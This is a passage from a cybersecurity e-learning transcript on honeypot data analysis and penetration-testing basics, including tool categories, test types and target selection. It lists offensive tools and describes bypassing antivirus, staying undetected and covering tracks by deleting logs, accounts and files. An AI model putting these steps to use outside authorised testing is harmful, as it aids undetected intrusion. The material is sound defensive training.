is now you can find out which is the visitor and what type of request is being
received. This is what needs to be analyzed. So that's it for this demo.
Honeypot Data Analysis
[Video description begins] Topic title: Honeypot Data Analysis. The presenter is
Ashish Chugh. [Video description ends]
Honeypot data analysis. Honeypot data can be captured, either using an automated
software, or through a manual method. Both methods have their own pros and cons.
So automated application or the software will help you capture data in a more
sophisticated manner. Which can be analyzed later on. Most of the applications or
the software will help you do the analysis on its own. Manual method is little more
complex, where you have to capture the data. You have to analyze it yourself. You
have to also capture the data from the initial compromise. This is how you want to
determine how the hacker got into the system. Whether it was a port that was open
and the hacker got in, or was it an application that was exploited. You would also
want to log all the actions after the initial compromise.
So initial compromise is just the starting stage. More crucial data happens later on,
where you want to log a hacker's actions after the initial compromise. You want to
see what the hacker has done. What kind of methodology has the hacker used to
compromise the system? To be able to collect useful data, you should log hacker's
all activities, even to the smallest activity that the hacker has performed on the
system. You should log that activity. You should collect information at many
TCP/IP layers. At each layer, there can be a different type of attack that can
happen. So therefore, you want to capture all that information and collect it. Collect
as much information as possible. You do not want to leave even a minute detail out.
Because it could be crucial for you to understand how the attack has happened.
[Video description begins] Types of Data Collected. [Video description ends]
Let's now see the kind of data that you can collect. You can collect the source IP
address from where the hacker has attacked the system. You can also check out the
source port number. The port number which was used to connect to the honeypot.
Commands issued during the attack. What type of commands did the hacker issue?
Maybe it was to extract data. Maybe it was to exploit a vulnerability. Maybe it was
to gain access to other systems. What type of user credentials were used by the
hacker? This is critical, because a hacker may exploit the existing user credentials
on the system, and then gain privileges. You also want to see what time did the
attack occur. Is honeypot being attacked at a certain time, or there is a random
timeline that is being used? This is a screenshot of KFSensor.
[Video description begins] A window called: KFSensor Professional – Evaluation
Trial is displayed. It is divided into four parts. The first part is the menu bar. The
second part is the toolbar. The third part is the navigation pane. It includes folders
called: TCP and UDP. The fourth part is the content pane. In the content pane data
is displayed in a tabular format. It contains eight columns and several rows. The
column headers include: ID, Start, Duration, Visitor, and Description. [Video
description ends]
Now, this particular screenshot displays the attack occurred on port 80. Which was
running Internet information services web server on Microsoft Windows. There are
certain attacks, they are happening at a repeated intervals, so they are being log.
Now, going back to the very first slide where we said a honeypot is not a real
system. And it does not expect any kind of incoming and outgoing traffic.
Therefore, now if there is incoming traffic that is taking place on port 80, this
means that this is a malicious traffic.
Course Summary
[Video description begins] Topic title: Course Summary. The presenter is Ashish
Chugh. [Video description ends]
So in this course, our goal was to identify the importance of honeypot and learn
how it plays a key role in network security. We did this by covering role of
honeypot for security, the different types of honeypots, design topics for honeypots,
weaknesses of a honeypot, and how a honeypot fits into larger security strategy. In
our next course, we will move on to explore the penetration testing, how it fits into
security program, and the various tools that would be used in penetration testing.
Information Security: Pen Testing
Explore the key penetration (pen) testing concepts such as vulnerability assessment,
types of pen testing, and threat actors, in this 14-video course. Discover why pen
testing is needed and investigate tools used for pen testing. Key concepts covered
in this course include pen testing, a set of tasks that are performed by ethical
hackers against an organization, but in a legal way; steps performed during the pen
testing process; and reasons why an organization needs to perform pen testing and
distinguish between pen testing and vulnerability assessments. Next, you will
compare the different types of pen testing and learn the weaknesses of pen testing;
learn the various types of tools used in pen testing and the target selection for pen
testing; and learn the types of assets in an organization; compare the types of risk
responses that an organization may adapt. Finally, learners observe how to use the
Metasploit framework in Kali Linux; and how to create an exploit by using
MSFvenom.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hello, my name is Ashish Chugh.
[Video description begins] Your host for this session is Ashish Chugh. He is an IT
consultant. [Video description ends]
I've been working in the IT industry for more than 25 years. I worked across
various domains such as IT infrastructure operations, software development,
cybersecurity, and e-learning. I've been working in the cybersecurity domain for
about five years and have various certifications in the same domain. These
certifications are Certified Ethical Hacker, Computer Hacking Forensic
Investigator, and Certified Network Defender from EC-Council. The other
certifications that I have are ITIL, MCSE, MCSA, MCPS, MCP, and CLP.
In this course, we will understand the need of pen testing and how it fits into a
security program. We will also understand the pen testing mindset of how that
affects your approach to security. Going forward in the course, we will also be
familiarized with different levels of penetration testing. And we'll also understand
some of the weaknesses around penetration testing. Finally, when we move towards
the end of the course, we will also understand the types of tools that are used for
penetration testing.
Pen Testing Process Introduction
[Video description begins] Topic title: Pen Testing Process Introduction. Your host
for this session is Ashish Chugh. [Video description ends]
Let's first define what penetration testing is. Penetration testing is a set of tasks that
are performed by ethical hackers or people who are expert in hacking against an
organization but in a legal way, which means ethical hackers who are either
contracted or hired by the organization to penetrate against its own network.
Let's move ahead and define penetration testing. Penetration testing is also known
as pen testing. In most cases, you would hear people talking about pen testing. And
some people would simply refer to it as penetration testing. So what does it do? It is
a simulated attack in which the ethical hackers or penetration testers would exploit
the vulnerabilities that may exist within a system, server, or the network. It could
also be an application. Before they exploit a vulnerability, they have to first find the
vulnerability and then exploit it.
Why would an organization would want to penetrate its own network? The intent is
they want to find the vulnerability before the hacker does. What we have to
understand is no application, no web application, no server system is secure
enough. There can never be enough security. There would be one or the other
vulnerability that would exist in any of these. So what the organization wants is
somebody to find and exploit the vulnerability before the hacker does.
In order for you to be able to do that, you have to start thinking like a hacker. You
cannot think like a system admin or IT security professional who works for the
organization and find vulnerabilities and exploit them. You have to wear the
hacker's thinking hat and find the vulnerabilities, as many as you can, and then
exploit them.
Penetration testing is a series of tasks that need to be performed, and they have to
be performed in a particular sequence. For instance, you would start with
reconnaissance, which means you will try to understand what the network is like,
you would find out basic details about the infrastructure or the server or the
network about an organization.
Beyond that, you would perform some bit of network discovery in which you
would probably would want to find the open ports within the network or a
particular server. Then you perform a vulnerability scan. You want to find those
vulnerabilities that have not been patched as of now. Then once you have found the
vulnerabilities, there could be one or there could be many.
Then you would use exploits to break these vulnerabilities and break the security
controls that have been implemented. Now why are we saying, break the security
controls? Let's assume a system, which is a critical server on the network, has not
been patched properly and there are several vulnerabilities that exist. Now server
also runs a firewall. It also runs an antivirus system.
So how would you get into this server by breaking the security controls? Answer is
simple, you would simply bypass. You would also bypass the antivirus application
that is installed on the server. Now most of these exploits are pretty smartly
designed and then they can bypass such security controls, after which you would do
manual probing and conduct the attack. So manual probing means you will dig
more into the server and then finally complete your attack.
Let's now understand the penetration testing process. So there are sequence of steps
that you have to follow to be able to complete the penetration testing process
successfully. So you start with planning, which means you first plan your
penetration testing. You do the basic planning of it, you understand what you have
to do. And this could involve something like getting the contract from the client or
understanding what needs to be done with a particular server or a network or a web
application.
Once that part is done, then you move into the reconnaissance phase and you
basically understand what the application or the server is all about. Then you do the
scanning part of it, in which you scan the server or the network or the web
application trying to find the vulnerabilities. Then you exploit them. Finally, you
gain access. Once you gain access, then you move to the next phase.
The next phase is maintaining access. So you have to basically lie low and remain
undetected for as long as possible. That is how you maintain access within a system
or a web application. Once that is done, you have done your job.
Then you have to cover your tracks, which means nobody should be able to trace
you backwards to your own IP address, that you were the one who conducted this
attack. So how you do that? You delete all the logs that have been generated while
you were there, while you were doing certain tasks within the system or the
network. You delete those user accounts. If there are certain files that you've
created within the system, you delete those files.
And then you quietly move out, after which, because you have to submit a report to
the client, you have to do result analysis. You have to find out what your team has
done, you have to collate all that information, do an analysis of the information.
And finally, you submit a report to the client, which is known as result reporting.
Need for Pen Testing
[Video description begins] Topic title: Need for Pen Testing. Your host for this
session is Ashish Chugh. [Video description ends]
Let's now understand what is the necessity of conducting penetration testing. There
could be possibility that there is a compliance requirement with specific
regulations. So for instance, if you talk about PCI DSS, which is Payment Card
Industry Data Security, it requires the organizations that handle large volume of
transactions to conduct both annual and regular penetration testing.
It could also be a reason that you want to protect your critical assets within the
organization. Now critical assets are most important to the organization. It could be
a server, it could be an application. So you want to protect that.
And why would you want to do penetration testing to protect these critical assets?
Because there would be vulnerabilities that you would want to explore. There
would be vulnerabilities that you find and then you close them. You mitigate those
vulnerabilities. So before the hacker finds it, you are able to not only find but
mitigate those vulnerabilities. You can close them.
It also helps you put appropriate security controls in place, which means if you
know there is a certain weakness within the network, let's say it's a flat network and
there are no network segments that have been put into the place, your critical file
servers are on the same subnet or the segment as the other users, so you know that
is a weakness within the network.
So you want to put appropriate security control. You would probably want to create
a new segment and move the file servers to that particular segment. So this is a
security control that you have put in place. Because you have been able to find the
vulnerabilities and you've been able to close the vulnerabilities, it will definitely
help you reduce the network and the system downtime.
For example, if there was a particular vulnerability that was exploited by a user on
a particular server, now you know if this same vulnerability existed on another
critical server, probably the server will be taken down by the hacker or you will end
up losing data.
So what do you do? You close those vulnerabilities on the other server. Therefore,
it would help you reduce the system downtime for that particular server. Similarly,
with the network devices, if you can find the vulnerabilities, you can close them
using penetration testing. Then you know you have been able to protect your
network to a great extent.
After a hacker does the damage on a network or on a system, you have to remediate
them. So if you are able to save the remediation by fixing things beforehand, you
will save lot of remediation cost. Most organizations hire a third party to do the
penetration testing of their network or infrastructure or the web application. Now
why do they do that? Because they want to get an outsider perspective.
How does an outsider who has bare minimum knowledge of the network or has
absolutely no knowledge of the network can penetrate and give them an outsider
perspective of what he or she thinks and what kind of vulnerabilities and flaws that
this person can find within the network or the web application or the servers?
Depends what the scope of penetration testing was. At least there is a second eye
looking at the targeted areas and trying to find security loopholes.
Once you have done your penetration testing, you know what areas you have to
invest in. So definitely you do not want to just throw in lot of money and put lot of
security controls that are probably not even required. So with the results of
penetration testing, you would have focused outcome. To be able to cover up those
flaws that have been found or the vulnerabilities that have been located, you know
what kind of security controls you need to put in.
Penetration testing also exposes the real weaknesses in a specific target, which
could be a network or a web application or a server. Because in the penetration
testing, the penetration tester would tend to get deep into the web application or the
network and exploit it as much as possible. So you would find the real weaknesses
that probably your internal security team was not able to find. Because for them,
everything is perfect and everything is running as it should have been.
And most importantly, it gives an impression to the internal teams that since they
have not been breached, their security is appropriate, enough security controls are
put into the place, and therefore there is no need to invest more. However, this may
not be the true scenario. Your true scenario will only come out when you see the
results of the penetration testing. Because you're trying to exploit a specific target,
you are actually simulating a real attack. You are acting like a hacker, you are
trying to exploit a particular target and exploit its vulnerabilities.
After you have done all your penetration testing, you can assess the impact of it.
Once you collate the report and do an analysis of the results or the outcomes of the
penetration testing, you'll be able to assess the impact of this penetration testing.
Pen Testing and Vulnerability Assessment
[Video description begins] Topic title: Pen Testing and Vulnerability Assessment.
Your host for this session is Ashish Chugh. [Video description ends]
Before moving ahead, let's also understand what vulnerability scanning means.
Vulnerability scanning is part of the penetration testing process. This is because
vulnerability scanning helps you discover vulnerabilities within a specific target.
And those targets can be a wired network, which is your typical Ethernet network.
It could be a web application, which is either hosted within your own premises in
the data center or it could be a third-party data center or it could be in the cloud.
It could be a wireless network that your organization is running. There could be one
or more wireless networks. But it is a myth that wireless networks are more secure
than the wired networks. That is not true. It depends on the configuration. It
depends on the settings that you have made to the wireless network.
Then comes the systems, which are your typical endpoints and the servers. And
your organization may also be using mobile apps. So you would also have to do
vulnerability scanning on these mobile apps. So moving ahead, where are we most
likely to find vulnerabilities? We are likely to find them in those systems which
could be endpoints of the servers or the applications or web applications that have
not been patched. Many organizations do not use automated systems to patch their
systems.
Now this causes a problem. Assume an organization with hundred systems and
there is only one IT person who has to manage these hundred systems. Now if this
person has to deploy a patch on every single system in a manual way, then it will
take him maybe a week or so. Now if there is an automated system that can deploy
patches, it solves a lot of problems.
Then you have unmanaged mobile devices. Lot of organizations allow users to
bring in their own devices, but they do not manage them, which means there is no
application that controls these mobile devices. Users are free to use different types
of apps on their mobile devices. Now why would a mobile device be concerned to a
network. Because lot of users connect their mobile devices to the network.
So if a vulnerability on the mobile device is exploited by a hacker, just imagine the
hacker will find its way within the network. Therefore, it is necessary to locate the
vulnerabilities in the unmanaged mobile devices. Then you also have poorly
configured firewall rules. Lot of IT administrators configure a firewall. However,
because there is a firewall in the place, every one of them thinks that their network
is safe.
If the firewall allows certain type of traffic because the rules were poorly
configured, it could allow the hacker to conduct an attack on the network. For
instance, if firewall allows ICMP packets, there is a very high possibility that a
DoS attack, or denial-of-service attack, can be conducted on one of the server that
is using a public IP address. Even though it is protected by a firewall, but still
because ICMP packets are allowed, the server can be attacked.
Then comes the problem of default passwords. This is one of the most severe
vulnerability found in the network devices. There have been many instances in the
past where the administrators forgot to change the default passwords of the edge
router. So for instance, if the password was abc123 by default, they kept it as is.
This is one of the major vulnerability which gets detected when you do
vulnerability scanning.
Open ports is considered to be another set of vulnerabilities. This is because most
often administrators do not close the open ports and these are those ports that are
not being used by any service or a web application. Therefore, a hacker might find
open FTP ports within the firewall and that may allow the hacker to conduct an
attack. So this is a vulnerability that these ports are open. You can always configure
something in replacement of FTP and open those ports.
So what is the good time for vulnerability scanning? In reality, there is no fixed
time. It depends entirely on your need and the time you are rolling out business
applications or you are making changes to your infrastructure. So for instance,
before launching an application, that is the good time when you should do
vulnerability scanning of the application.
Now once you have done that, you will find there are certain vulnerabilities that
exist within the application, you would close them. Let's say, one month later there
is an update on the web application; a new module has been added to the
application. So what do you do? You go back and conduct another vulnerability
scan because this new module might have triggered another vulnerability. So
therefore, that is another good time when you should conduct a vulnerability scan.
And of course, vulnerability scans should happen on regular basis. It depends on
the organization. They could do it after every six months, they could do once a
year. It depends entirely on the organization. A vulnerability scanning requirement
may also come up because of a compliance framework. For instance, if you are
opting for PCI DSS, you will have to conduct a vulnerability scan after a fixed
interval. That becomes the demand from the compliance framework.
Let's now look at some of the tools for vulnerability scanning. So you have
Nexpose Community, which aims as entire vulnerability management life cycle.
Then comes the Tripwire IP360, which is a vulnerability management solution.
Then comes Nikto, which is command line vulnerability scanner. Then we have
Retina CS Community, which is a vulnerability management solution and a
scanner. Then one of the most known solution, which is an open-source solution, is
OpenVAS, which is a security framework for vulnerability scanning and
management.
Let's now look at the differences between vulnerability scanning and penetration
testing. So the goal of vulnerability scanning is only discovering vulnerabilities.
Penetration testing, on the other hand, goes one step ahead. And it not only
discovers the vulnerabilities, it also exploits them. Vulnerability scanning mostly
uses automated methods. So the tools you will run, they will automatically go and
scan the web application or the server or a system and find vulnerabilities.
Penetration testing, on the other hand, is a manual method. If you are not using a
ready-made exploit, you will have to design your own exploit, you have to code
them, and then you have to find a way to deploy that exploit. Vulnerability
scanning can also report false positive. On the other hand, penetration testing does
not give you any kind of false positive. It only reports what has been done.
As far as the scope is concerned, vulnerability scanning has a very broad scope. So
it tries to find as many vulnerabilities as it can, but it does not go into the depth of
those vulnerabilities. Penetration testing, on the other hand, is very focused. It will
not only find the vulnerabilities but it will try to exploit them. So it uses depth over
breadth.
Vulnerability scanning can be performed by a newbie or a novice user because you
are using automated tools. Penetration testing, on the other hand, cannot be
performed by a newbie or a novice person. It has to be performed by experienced
pentester. One of the main reasons is that not only you need to know about certain
tools, you also need to know about certain exploits that can perform certain types of
tasks.
Vulnerability scanning, because it is automated, it is quick. It takes only a few
minutes to scan a server or a web application. Penetration testing, on the other
hand, it might span over several days or several weeks depending on the size of the
penetration testing that you are performing, depending on the number of targets that
are included in the penetration testing.
The outcome for the vulnerability scan is the list of vulnerabilities. In the
penetration testing, not only you get the list of vulnerabilities, you also have the
methods to exploit them. You also find the remediation, and you also list down the
recommendations as the output of the penetration testing. Vulnerability scanning is
a passive scan. So therefore, it does not directly get into the web application or the
server and disrupts the functioning of it. It does a passive scan.
However, penetration testing, because you are trying to exploit certain
vulnerabilities, there is a possible disruption. And this is considered to be an active
attack because it is a simulated attack as the real one. Vulnerability scanning is a
detective-type scanning, which means you only detect vulnerabilities. Penetration
testing, on the other hand, it is preventive. Not only you find the vulnerabilities,
you exploit them. You then find the remediation to cover up those vulnerabilities
and reduce the risk or the exposure of finding more vulnerabilities by somebody
else.
As we have discussed, vulnerability scanning runs in the passive mode and
penetration testing, on the other hand, is intrusive. It gets into the application. It
tries to find as many vulnerabilities as it can and it then tries to exploit them.
Therefore, it is not only intrusive, it is also considered to be aggressive.
So once the vulnerability scanning is done, what are the next steps? So you have to
remediate those vulnerabilities. Let's assume that you are not proceeding with the
penetration testing, your scope is only to do vulnerability scanning. Then after you
find them, you find out the methods of remediating these vulnerabilities.
Penetration testing, on the other hand, you have to ensure that you have patched the
vulnerabilities and you have put enough security controls to ensure similar
vulnerabilities are not discovered.
Types of Pen Testing
[Video description begins] Topic title: Types of Pen Testing. Your host for this
session is Ashish Chugh. [Video description ends]
Let's now understand the different types of penetration testing. So essentially there
are three types. You have white box, you have grey box, and you have black box.
Going forward, we'll be looking at each one of them in detail. So when you talk
about black box penetration testing, the pentester or the person conducting black
box penetration testing has zero knowledge of the network.
In the black box penetration testing, the pentester does not know anything about the
network except for an IP address range. That is all they are given and rest they have
to know what needs to be done. In most cases of black box penetration testing, the
pentester is typically an external entity who you have hired to exploit the network
or the system to the fullest.
Therefore, the person conducting the penetration testing or the pentester just knows
that there is a certain type of outcome that is expected and that should happen
without fail. Also, there is no programming code that is given to the pentester.
Remember, they are just given an IP address range. There is nothing else, no
architecture, no programming code, no access to the network has been given to
them. They have to just sit outside the network and they have to try to exploit it.
So this type of testing takes more time because the pentester does not know
anything about the network or the web application. However, this particular method
is more effective than the white box penetration testing or grey box penetration
testing because the pentester can provide an accurate assessment of the security of
the network.
Now when you talk about white box penetration testing, it is also known as clear
box testing and it is a complete opposite of black box penetration testing. The
pentester has the full knowledge about the network. They have access to the
network diagrams, they have access to the list of systems and the IP addresses.
They have access to the IP ranges that is used within the network and they also
have the user credentials to log on to the systems.
And of course, they also get access to the programming code. Therefore, it is also
known as full knowledge penetration testing because nothing is hidden from the
pentester. In this case, the pentester conducting the white box penetration testing
takes less time than the one who is conducting black box. This is because pentester
has all the information about the network that is needed for penetration testing. On
the other hand, the black box guy doesn't have anything except the IP address
range.
Let's now understand what grey box penetration testing means. The pentester who
is conducting the grey box penetration testing has partial knowledge of the system
or the network. This means there is a limited information that is provided to the
pentester. For example, the pentester will not have the user credential or the
configuration details about the systems or the network.
However, they may be given the application name and the IP address but you do
not share the application version or the services that the application is running. So
therefore, there is a limited knowledge that is shared with the grey box penetration
testers. And it is a combination of both black and white penetration testing. This is
because you are sharing some information but not sharing everything with the
pentester. And just like no username, passwords, they also do not have access to the
programming code.
So what are some of the areas where penetration testing can be used? So one is
your network; that is the typical Ethernet network you are running. Then it could be
wireless network, which could be small or large in size. It could be running
different types of wireless protocols; something like WPA, WPA2.
And it could also be used for social engineering because humans are the weakest
link in the security chain. So you may use social engineering methods and trying to
exploit some of the employees within the organization. For example, you can just
send them phishing mail or you can call them up and pretend to be somebody else
from the police department. So you could use this particular method.
Then it could also be used for web applications because you would want to find the
vulnerabilities, you would want to mitigate those vulnerabilities. You want to
reduce the risk of that application getting attacked. Then comes the client-end,
which are the endpoints. Now since users are using these endpoints, there are going
to be configuration problems, there are going to be security issues. So you have to
find out those issues and close them.
Pen Testing Weaknesses
[Video description begins] Topic title: Pen Testing Weaknesses. Your host for this
session is Ashish Chugh. [Video description ends]
Penetration testing has advantages and disadvantages. Let's now first look at the
advantages or the pros of penetration testing. It helps you identify vulnerabilities,
which could be low risk or high risk. And of course, high-risk vulnerabilities are
the attention grabbers because you would want to fix them first.
It is a proactive security approach because you want to find these vulnerabilities,
reduce the risk on the application or the network, and you want to patch them
properly because you do not want a hacker to find these vulnerabilities, even
though there would be cases where hacker would still be able to find some more
vulnerabilities which you would have not been able to find.
So for instance, a zero-day vulnerability in an application. Now zero-day
vulnerability is something that is probably not looked at in the penetration testing.
And what it can do, it can help the hacker exploit the entire application. It also
helps you exploit real security risks. So for instance, there is a vulnerability that has
been detected. You can exploit it and see what kind of damage it can cause if the
hacker does the same thing.
So if it is a high-risk vulnerability, the risk of being exploited is also high. So you
want to find that vulnerability and you want to mitigate that particular risk by
closing it. During the penetration testing, you may also come across some known
and unknown flaws. So for instance, I just spoke about zero-day vulnerability. That
is a unknown flaw. That has not been ever reported by the software developer or it
has never been detected earlier. So you've been able to detect that particular kind of
flaw.
And then there would be some known flaws. So for instance, Server Message
Block version 1 protocol runs on older versions of Windows. Now if you are still
running older versions of Windows, you know that there are some known flaws on
this particular endpoint. Therefore, you can discover all this using penetration
testing. Then once you are done finding the vulnerabilities, once you have
exploited them, towards the closure of the penetration testing project, you have to
submit a report to the client where you can advise the client how to close out these
vulnerabilities.
Let's now look at disadvantages or cons of penetration testing. So first of all, it is
time-bound. Every penetration test has to happen within a specific time limit. Now
if you are going to take six months to conduct a penetration test, it is not going to
work out because things in the network or the infrastructure would have changed
by then. So the penetration testing that you started six months back is no longer
valid. So it has to be finished within a few days or a few weeks, depending on the
scope of the penetration testing.
There are limited resources. This is because you may not have the complete
manpower or the tools to conduct penetration testing. Or there is no inputs or help
or resources provided by the client. In many cases, because the client wants the
attack to be simulated as a real attack, so they'll give you limited access to their
network.
Assume that you've been asked to do black box penetration testing. In that case,
you only have the IP address range. You do not have any kind of access to the
network. Therefore, there is a limited access or no access at all. You can also use
limited methods. Now these methods here means that if you know there are certain
type of vulnerabilities that exist within a particular application, you can only use a
specific method to exploit it.
So penetration testing is not where you would want to develop innovative methods
and trying to exploit a vulnerability. It is use the limited methods that you know of,
or maybe, you know, add something that can help you achieve the end goal.
Availability of the production system is also a question mark in this scenario
because organizations would typically not give you access to these production
systems during the daytime. That is because their users are connected and there is
always a fear of a particular production system crashing or becoming unavailable
during the penetration testing. Then you have limited experiments.
Now in penetration testing, you cannot do too much of experiments with the client
servers. There would be production servers, there would be staging servers,
depending on the scope of the project. Now there is not much scope to do lot of
experiments. Because lot of experiments will require more time and you only have
limited time. Secondly, lot of experiments may not give you the correct results.
Tester's skill is another thing that needs to be watched out for. Not everybody in the
team will be expert in penetration testing. Therefore, you should ask the most
experienced pentester to front-end the project because he is the one then who is
going to be doing lot of exploitation of the systems and the network. Therefore, that
person must be brought forward.
As there are more and more vulnerabilities are being discovered, more and more
exploits are being created. If you take the example of Metasploit Framework, there
are continuous additions of new exploits. Now you need to have more in-depth
knowledge about the exploits. During the penetration testing, you do not have the
liberty of sitting and trying to find an exploit which can exploit a particular
vulnerability. You will not get the time. You will not have the liberty of spending
and wasting time on finding exploits. So this becomes a real challenge.
Because sometimes a vulnerability is less known but you need to exploit it. And
therefore, if you do not have sufficient knowledge, this becomes a drawback of
penetration testing. Most often, clients are apprehended or they are scared to hand
over the production systems to penetration testing teams. This is because if
anything goes wrong in the penetration testing, the client might end up losing all
the data in the application. So therefore, during the penetration testing, you have to
handle the data very, very carefully.
Another disadvantage of penetration testing is that the client must trust the
pentester. Because the client is handing over critical information, the pentester is
actually getting into the network and finding lot of information which can be used
for hacking into a network or a web server or a web application. Therefore,
sometimes the clients do not really trust the pentesters and give them very, very
limited information.
Types of Pen Testing Tools
[Video description begins] Topic title: Types of Pen Testing Tools. Your host for
this session is Ashish Chugh. [Video description ends]
Let's now talk about the categories of tools that are used in penetration testing. So
there are various categories that fall under penetration testing. You have scanning,
which means you scan the network or scan the traffic that is flowing over the
network. You have credential testing, which involves recovering passwords or
cracking passwords. Then you have debugging, which involves more of reverse
engineering kind of methods.
Then comes the mobile. There are lot of mobile apps that most organizations use.
So you have tools that can be used to test out mobile apps. Then you have OSINT,
which stands for open source intelligence gathering. Now there are tools that are
available which can help you find lot of information on the Internet in a passive
mode, something like you can try to find out all the e-mail addresses that are
publicly made available by an organization.
Moving next, then you have the wireless. There are tools like Kismet that are
available for wireless penetration testing. Then you have web proxy. You have
tools like OWASP ZAP, which is a web application security scanner. Then there is
another web proxy which is most widely used, is known as Burp Suite. Then comes
the social engineering. You have tools like Social-Engineering Toolkit that can
help you conduct a social engineering attack.
Then comes the remote access. You have various tools that can be used. So for
instance, Netcat is one tool that can be used for penetration testing in remote access
category. Then finally, you have the networking category in which you have tools
like Wireshark, which is a packet capturing tool. You can intercept lot of traffic
from the network and analyze it.
Let's first look at some of the scanning tools. Scanning tools are mainly used for
scanning a network for finding live systems, systems that are alive on the network.
Or they could also be used for finding open ports or running services on a system.
Some of the examples of scanning tools are Nmap, which is known as Network
Mapper. It is an open-source security scanner which is mainly used for scanning for
open ports and services.
Then comes Netcat, which can send data for network connections using TCP and
UDP protocols. After that, there is another one called MyLANViewer, which can
scan IP addresses and find open ports and services. Then comes OpenVAS, which
is used for mainly scanning the vulnerabilities of a system. Then comes hping3,
which is an upgrade of a tool called hping and it allows you to send custom TCP
and UDP packets.
Moving on, then we come to credential testing tools which are essentially tools that
deal with passwords, either recovering the passwords or cracking the passwords.
There are various tools that are available in this category. The first one is Medusa,
which is an open-source password auditing tool. Then comes Cain and Abel, which
is a password recovery and password cracking tool. Then comes the THC-Hydra,
which is a login cracker for various protocols, and you can crack passwords for
various web applications.
Then comes Hashcat, which is a password recovery tool. Finally, one of the most
widely used tool is John The Ripper, which is a free password cracker. Let's now
move on to debugging tools. Debugging tools are tools that are mainly used for
reverse engineering of an executable file or for performing an analysis of the
executable. There are various tools. So one you have is OLLYDBG, which is a
debugger for binary analysis. Then comes IDA which is interactive disassembler
for software.
The next one in line is Immunity Debugger which helps to reverse engineering
files. GDB is an online compiler for C and C++ files. Then comes the WinDBG
which is a debugger for Windows, and it helps to find and resolve errors in a
system. Moving on to the mobile category, there are three main tools. The first one
is Drozer, which is mainly used for Android exploits. Next one is APKX, which is
used for decompiling an APK file. If you know, APK file is the Android apps.
Then comes the APK Studio, which is an IDE for reverse engineering an APK file.
Let's now look at OSINT, which is open source intelligence. There are various
tools. Some of them are online, some of them are offline, which means you can
install them on your system. First one is WHOis, which is a domain name
registration database. You can simply go to the WHOis website and enter a domain
name, and it will give you the complete information about the domain. However, if
the domain is marked private, then you will not get any information.
The next one is Maltego, which is used for open source intelligence. It is used for
finding relationships between various pieces of data. Then comes Recon-ng, which
is an information harvester. Next one is theHarvester, which is used for finding email addresses. So you can put a domain name and any e-mail address that is
publicly available on a search engine, it can find the e-mail addresses for that
associated domain.
Let's now talk about Shodan, which is a search engine for finding devices
connected to the Internet. Let's now move to the wireless category. In the wireless
category, there are various tools but we have listed four key tools that you can use.
So first one is WiFi-Pumpkin, which is a framework for rogue Wi-Fi access point
attacks and can create fake networks. Next one is Aircrack-ng, which is used for
assessing the Wi-Fi security.
Then comes Kismet, which is a wireless packet sniffer and intrusion detection
system. Finally, WiFite is a tool that can attack various wireless protocols, such as
WEP, WPA, and WPS. Let's now look at the web proxy category. Just like the
other categories, this category also has various tools. First one is OWASP ZAP,
which is a web application security scanner. Then comes Fiddler, which logs HTTP
and HTTPS traffic from a system.
One of the most widely used is Burp Suite, which acts as a proxy between the
browser and the application. So when configured correctly, you can actually
capture the traffic which is going from a browser to the web application. And if the
traffic is flowing in clear text, it can help you capture lot of details such as
username and passwords for that particular web application. Then comes ratproxy,
which is a passive web application tool. Then comes the mitmproxy, which is used
for intercepting HTTP and HTTPS traffic.
Now let's look at some of the tools that are available in the social engineering
category. First one is Maltego, which helps to find and visualize data. It is a open
source intelligence tool which is used for finding relationship between various
pieces of data. Then comes Social Engineering Toolkit (SET), which is used for
conducting social engineering attacks.
So using this tool, you can create phishing e-mails, you can create spam e-mails,
and then you can use other tools to deploy them. Then comes BeEF, which is
Browser Exploitation Framework, mainly used to hack web browsers. Let's now
move to the remote access category. The first one is SSH, which is known as
Secure Shell. It is used for creating encrypted communication channels.
Then comes the Netcat, which can send data for network connections using TCP
and UDP protocols. Then comes the proxy chains, which forces a TCP connection
to use a proxy. Then comes Ncat, which is used for writing, redirecting, and
encrypting data across a network.
Let's now move to the last category, which is networking. There are various tools in
the networking category. The first one is Wireshark, which is a packet capturing
tool. It can intercept traffic which is flowing across the network from all systems.
And then you can analyze traffic and see which traffic is malicious, which traffic is
genuine traffic and it is legitimate, and which traffic is considered to be malicious.
Then comes Hping3 which is an upgrade of Hping tool. It allows you to send
custom TCP/IP packets. Then comes the TCPdump tool, which is command line
tool and it is a packet analyzer. Finally, then comes the Kismet tool, which is a
wireless packet sniffer. This tool we also looked at in the wireless category.
Target Selection for Pen Testing
[Video description begins] Topic title: Target Selection for Pen Testing. Your host
for this session is Ashish Chugh. [Video description ends]
Let's now look at target selection. When we are finalizing the scope of penetration
testing, we need to essentially look at the target selection. There could be various
types of targets that need to be defined when we are finalizing the scope.
Now because the scope can be very limited or it could be very broad, the number of
targets and the types of targets will differ. It is not essential that all the penetration
testing projects that you do will have the same types of targets. Some would have
limited, let's say, one project will have web application as the target, another
penetration testing project that you do would have the complete network as the
target. So it would depend on the scope of the project, and you would only select
targets based on that.
It is not necessary that every penetration testing would have only one target. There
could be one or more. So for instance, not only the web application, you would also
have to exploit the web server and some of the other servers that are present on the
network. So depending on the scope of the project, the number of targets can also
differ.
Let's now look at the types of targets. Previously, we spoke about, there could be
one or more targets that are included in the penetration testing scope. Now these
types of targets differ. So it could be an internal target, which is internal to your
network. It could be an on-site target, which is hosted somewhere in the data
center. It could also be an off-site target, which could be a vendor or a partner firm
where your system is located. It could also be an external target, which is located
somewhere remotely and it is external to your network.
Then you also have first-party hosted, which means it could also be hosted in a data
center by one of your partners. Then it could also be third-party hosted, which
means it could also be located somewhere in the cloud. Let's say, one of the web
application is hosted either on the Azure network or the Amazon cloud network; it
could be third-party hosted.
Then target could also be physical, which means you also want to exploit the
physical boundaries or the physical security of a building. You want to gate-crash
or you want to tailgate within a building or a secure location and see if the guards
or the systems are able to stop you. Then it could be users also, which means if you
conduct a social engineering attack, are the users falling in for that?
When you talk about SSIDs, these are the IDs of the wireless network, can you find
a SSID, which is not a very difficult thing to do. There are tools that can find the
hidden networks. But can you exploit those wireless networks beyond that? When
you refer to applications, it could be locally hosted or it could be somewhere in the
cloud or it could be somewhere on a third-party server in the data center. So you
need to exploit that. So this could also be one of the targets. And web applications
and networks are two prominent targets when you are dealing with penetration
testing.
Threat Actors
[Video description begins] Topic title: Threat Actors. Your host for this session is
Ashish Chugh. [Video description ends]
Let's now look at threat actors. So what is a threat actor? It is an individual or a
group that can cause harm to an asset or assets in an organization. A harm can be in
the form of modification, destruction, or disclosure. So for example, if somebody
takes confidential information from your organization and makes it public, that is
